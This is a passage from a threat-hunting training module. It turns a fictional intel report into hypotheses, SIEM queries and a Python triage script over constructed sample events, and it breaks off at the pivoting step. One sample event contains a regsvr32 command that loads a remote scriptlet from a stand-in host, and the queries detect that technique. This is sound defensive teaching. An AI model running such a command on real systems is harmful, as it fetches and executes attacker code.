Intel-driven threat hunting is where CTI pays off operationally. A threat report says “APT group X is using technique Y against sector Z” and, within hours, you are running queries against your environment to find whether you were hit. This module walks through a full cycle, from a fresh intel report to a hunt plan, queries, and findings: the capstone of the CTI track.
Hunting vs alerting: the distinction
- Alerting: known bad triggers automatically; SOC triages
- Hunting: analyst actively searches for unknown bad by hypothesis
Hunting fills the gap between “we have a signature for it” and “we haven’t heard about it yet.” Intel-driven hunts are fast: they have a specific hypothesis and bounded scope.
The hunt cycle
- Hypothesis: “If APT X is targeting us with technique Y, we would see pattern P in logs Q”
- Data check: do we have the logs needed? If not, the hunt is blocked; note the gap
- Query: translate the hypothesis into a SIEM search; scope the time window
- Triage: review results; identify true hits
- Enrich & correlate: for hits, pivot to related activity
- Conclude: hit found? Open an incident. No hits? Document the hypothesis as tested and move on
- Productionize: if the hunt logic is valuable and low-noise, convert it to a detection rule
From an intel report to a hypothesis
Example intel snippet (fictional):
“Threat group TRITON-INDIA is targeting Indian SaaS firms since March 2026. Initial access via spearphishing with ISO attachments containing LNK → regsvr32 loading malicious SCT from attacker-controlled CDN. Post-exec: installs scheduled task named ‘GoogleUpdateTaskMachineCore’. C2 over HTTPS to *.cloudfront-proxied domains with User-Agent string ‘Mozilla/5.0 (compatible; MSIE 11.0)’.”
Extracted hypotheses:
- Spearphishing with ISO attachments: emails with .iso, .img, .vhd attachments from untrusted senders
- regsvr32 loading remote SCT: regsvr32 command lines with “scrobj.dll” and a URL
- Scheduled task with the Google-Update-lookalike name
- HTTPS traffic with the MSIE 11 User-Agent
Hunt query examples
In Elastic (Kibana KQL, ECS field names)
# Hypothesis 2: regsvr32 remote SCT (colons inside unquoted KQL values must be escaped)
process.name : "regsvr32.exe" and
process.command_line : (*scrobj.dll* and (*http\://* or *https\://*))
# Hypothesis 3: scheduled task name (Security event 4698, task created; wildcards go unquoted)
event.code : "4698" and
winlog.event_data.TaskName : *GoogleUpdateTask* and
not winlog.event_data.SubjectUserName : ("SYSTEM" or "LOCAL SERVICE")
# Hypothesis 4: suspicious User-Agent (user_agent.original is the ECS field for the client header)
user_agent.original : "Mozilla/5.0 (compatible; MSIE 11.0)"
In Splunk (SPL)
Hypothesis 2 (regsvr32 remote SCT, Sysmon process creation):
index=sysmon EventCode=1 Image="*\\regsvr32.exe"
CommandLine="*scrobj.dll*" CommandLine="*://*"
Hypothesis 1 (ISO/IMG/VHD attachments from untrusted senders):
index=email attachment_ext IN ("iso","img","vhd")
sender_address!="*@trusted-partner.com"
| stats count by sender_address, recipient, subject
In Sentinel (KQL)
// Hypothesis 2: regsvr32 remote SCT
DeviceProcessEvents
| where FileName =~ "regsvr32.exe"
| where ProcessCommandLine contains "scrobj.dll"
| where ProcessCommandLine has_any ("http://", "https://")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
Triage discipline
Intel-driven hunts often produce 10-50 hits. You cannot investigate all of them; prioritise:
- Eliminate known-good patterns: your own software deployment processes, authorized scripts
- Sort by recency: fresh hits are more likely attacker-related than weeks-old ones
- Sort by unusualness: users or hosts that rarely show this behaviour
- Cross-reference the multiple hypotheses: a host with hits in hypothesis 2 AND 3 is much more likely to be compromised than a host with one
After triage, 50 hits typically reduce to 2-5 “investigate further” candidates.
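The hypothesis checks and the triage ordering above, combined into one offline script. This is an added example, not the module's own code; the sample events are constructed and their field names (ts, host, type, cmdline, task_name, user, user_agent) are simplified assumptions rather than any real SIEM schema.

```python
import re
from collections import defaultdict
# Constructed sample events (not real telemetry); field names are simplified assumptions.
SAMPLE_EVENTS = [
    {"ts": "2026-04-02T09:15:00Z", "host": "ws-042", "type": "process",
     "cmdline": r"regsvr32.exe /s /n /u /i:https://cdn.example.invalid/a.sct scrobj.dll"},
    {"ts": "2026-04-02T09:16:10Z", "host": "ws-042", "type": "task",
     "task_name": r"\GoogleUpdateTaskMachineCore", "user": "jdoe"},
    {"ts": "2026-03-01T08:00:00Z", "host": "ws-017", "type": "task",
     "task_name": r"\GoogleUpdateTaskMachineCore", "user": "SYSTEM"},
    {"ts": "2026-04-01T12:00:00Z", "host": "ws-099", "type": "http",
     "user_agent": "Mozilla/5.0 (compatible; MSIE 11.0)"},
    {"ts": "2026-04-02T10:00:00Z", "host": "ws-003", "type": "process",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\app.dll"},
]

KNOWN_GOOD_USERS = {"SYSTEM", "LOCAL SERVICE"}  # mirrors the SubjectUserName exclusion above
URL_RE = re.compile(r"https?://")

# One predicate per hypothesis, each a direct translation of the SIEM queries above.
def h2_regsvr32_remote_sct(e):
    cmd = e.get("cmdline", "").lower()
    return (e["type"] == "process" and "regsvr32" in cmd
            and "scrobj.dll" in cmd and URL_RE.search(cmd) is not None)

def h3_task_lookalike(e):
    return (e["type"] == "task" and "googleupdatetask" in e.get("task_name", "").lower()
            and e.get("user") not in KNOWN_GOOD_USERS)

def h4_msie11_user_agent(e):
    return e["type"] == "http" and e.get("user_agent") == "Mozilla/5.0 (compatible; MSIE 11.0)"

HYPOTHESES = {"H2": h2_regsvr32_remote_sct, "H3": h3_task_lookalike, "H4": h4_msie11_user_agent}

def run_hunt(events):
    """Return (hypothesis, event) pairs for every raw hit; this is the pre-triage result set."""
    return [(name, e) for e in events for name, check in HYPOTHESES.items() if check(e)]

def triage(hits):
    """Rank hosts: most distinct hypotheses first (cross-reference), then most recent hit."""
    per_host = defaultdict(lambda: {"hyps": set(), "latest": ""})
    for name, e in hits:
        per_host[e["host"]]["hyps"].add(name)
        per_host[e["host"]]["latest"] = max(per_host[e["host"]]["latest"], e["ts"])  # ISO-8601 sorts lexically
    ranked = sorted(per_host.items(), key=lambda kv: (len(kv[1]["hyps"]), kv[1]["latest"]), reverse=True)
    return [(host, sorted(v["hyps"]), v["latest"]) for host, v in ranked]
if __name__ == "__main__":
    for host, hyps, latest in triage(run_hunt(SAMPLE_EVENTS)):
        print(f"{host}: {','.join(hyps)} (latest {latest})")
```

On the sample data the SYSTEM-owned task on ws-017 is dropped as known-good, and ws-042 ranks first because it hits both hypothesis 2 and 3.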
Pivoting on hits
For each high-priority hit, pivot: